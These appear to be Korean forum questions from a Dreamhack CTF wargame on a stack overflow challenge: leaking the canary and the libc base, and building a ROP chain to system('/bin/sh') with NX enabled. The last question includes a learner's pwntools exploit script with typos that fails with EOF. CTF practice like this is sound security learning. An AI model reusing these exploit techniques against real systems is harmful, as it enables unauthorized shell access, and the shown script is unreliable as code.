canary leak까지는 했는데.. 리턴 주소를 뭘로 덮어야 할까요? NX enabled라서 쉘코드 삽입해도 안되고 system('/bin/sh')호출하려면 매개변수 세팅을 해야 하는데 rop gadget에 pop rdi도 없더라구요.. 키워드위주로 힌트 주시면 감사하겠습니다

카나리를 릭하는 것과, readint를 이용해서 overflow시켜 return address를 overwrite하는 것 까지는 스스로 알아냈는데 libc base를 구하는 것에 막혔었습니다. 풀이를 보니, __libc_start_main + 128의 주소가 처음 카나리 릭할 때 뒤의 여러 주소값들과 섞여있더군요. 이 __libc_start_main + 128 주소가 카나리 뒤의 여러 주소값들과 섞여있다는 걸 안다는 것은 배경지식인건가요? 아니면 gdb를 통해 충분히 알아낼 수 있었던 건가요?

익스코드가 EOF가 계속 뜨는 이유를 모르겠습니다. from pwn import * r=remote("host1.dreamhack.games",19904) lib=ELF("./libc.so.6") context.log_level="debug" r.sendafter("> ",b"3.") r.sendafter("> ",b"2.") r.sendafter(".",b"a"*256) r.sendafter("> ",b"1.") r.recvn(272) canary=u64(r.recvn(8)) print(hex(canary)) r.recvn(24) lib_start=u64(r.recvn(8)) print(hex(lib_start)) lib_base=lib_start-lib.symbols['__libc_start_main']-128 sys=lib_base+lib.symbols['system'] binsh=0x1d8698+lib_base p_rdi=0x2a3e5+lib_base ret=0xbab79+lib_base pay=b'a'24+p64(canary)+b'a'8+p64(p_rdi)+p64(binsh)+p64(ret)+p64(sys) r.sendafter("> ",pay) r.send(b".") r.interactive() `